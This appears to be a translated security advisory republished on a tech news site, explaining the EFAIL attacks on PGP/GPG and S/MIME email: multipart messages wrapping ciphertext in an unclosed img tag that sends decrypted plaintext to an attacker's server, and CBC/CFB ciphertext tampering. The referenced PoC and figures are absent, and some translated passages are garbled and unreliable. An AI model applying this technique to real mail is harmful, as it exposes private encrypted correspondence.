Shulou(Shulou.com)06/01 Report--

How to analyze PGP/GPG and S/MIME vulnerabilities in EFAIL? aiming at this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

0x00 vulnerability background

PGP/GPG and S/MIME are two important standards that provide end-to-end security for e-mail.

On the 14th, European security researcher Sebastian Schinzel gave a vulnerability warning to PGP/GPG and S/MIME on twitter, and then the details were made public.

360-CERT continues to pay attention to vulnerabilities and analyzes them in detail.

0x01 vulnerability details

There are many ways for email clients to display email content, among which HTML rendering is the most popular one. HTML supports requests for network resources, such as

, etc.

This EFAIL attack is based on the help of

The src attribute of the tag, which sends the decrypted text to a remote server controlled by the attacker, resulting in information disclosure.

The root cause of the vulnerability is that when dealing with multipart messages, the e-mail client handles each multipart independently, and when displayed, it will render multiple multipart messages to the same HTML. In this way, when the email is displayed, the plaintext and the decrypted original text will be displayed together, and there will be security risks here.

0x02 penetration attack

Multiple segments are allowed in the email, as shown in the figure:

Multipart carries out multi-part identification, protocol is configured, and boundary is used for segmentation.

When the mail client processes the message, it processes each part independently, but eventually renders it to the same HTML interface. So we can construct the following PoC to take advantage of this feature:

As you can see, PoC uses boundary to divide the mail into three parts: Content-Type: text/html, Content-Type: multipart/encrypted;protocol= "application/pgp-encrypted";, and Content-Type: text/html.

The first part defines an img tag, a remote host in src that accepts plaintext messages for attackers. Note: here, the quotation marks of src and the / > of img are not closed.

The second part is the e-mail body after using end-to-end encryption.

In the third part, the label of the first part is closed.

Because the mail client handles each multipart independently, the encrypted message is decrypted in the process. When the victim opens the message, it is decrypted and rendered, and finally the message is resolved as:

When such content is displayed by the victim's e-mail client, an http request is initiated to send the encrypted original message to the attacker's host.

0x03 S/MIM defect

If S/MIME uses CBC or CFB mode, it will be attacked by EFAIL.

Take CBC as an example, the CBC mode is segmented plaintext, and each piece of data is encrypted through the header and the previous ciphertext. As shown in the following figure:

In (a) here, there is known data IV,C0,P0, and the whole disclosure process will automatically or later get the part of C2Query C3, that is, the target data unknown plaintext that we want to reach out.

The attack logic is simple, tampering with the ciphertext part of the known header tag (plaintext paragraph "Content-type") into an img tag, wrapping the encrypted ciphertext. In this way, the parsing display will achieve the same attack effect as the first method.

CFB mode is similar to CBC in that it is necessary to know part of the plaintext of the encrypted content and gradually replace and insert the img tag to achieve the purpose of attack.

0x04 vulnerability demonstration

Vulnerabilities have many attack scenarios, such as man-in-the-middle attacks.

The attacker acts as a middleman to hijack mail traffic and add multipart before and after the encrypted mail point. After the user is opened by the email, the plaintext content will be sent to the attacker by the img tag. To achieve the effect of encrypted email leakage:

0x05 vulnerability impact surface

The vulnerability affects multiple applications on multiple platforms, including window,linux, Android, IOS, and so on. The specific scope of impact is shown below:

0x05 security recommendations

Although the loophole affects the atmosphere widely, it is difficult to use it.

There is currently no fix for this vulnerability, so before the vulnerability is fixed, please disable or uninstall the tool that automatically decrypts PGP encrypted email immediately. Do not read PGP encrypted messages.

This is the answer to the question on how to analyze PGP/GPG and S/MIME vulnerabilities in EFAIL. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.